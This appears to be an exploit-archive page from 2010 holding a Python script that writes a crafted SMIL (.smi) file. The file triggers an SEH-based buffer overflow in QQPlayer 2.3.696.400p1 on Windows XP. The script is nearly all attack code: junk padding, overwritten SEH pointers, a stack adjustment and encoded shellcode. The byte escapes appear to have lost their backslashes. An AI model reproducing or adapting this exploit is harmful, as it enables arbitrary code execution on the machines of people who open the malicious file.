[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : QQPlayer smi File Buffer Overflow Exploit
# Published : 2010-07-27
# Author : Lufeng Li
# Previous Title : Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit
# Next Title : Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''
junk = "A" * 2001
nseh ="x42x61x21x61"
seh ="x39x0cx41x00"
adjust="x30x83xc0x0b"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''"/>
</head>
<body>
<seq>
<video src="rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001" title="_"fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()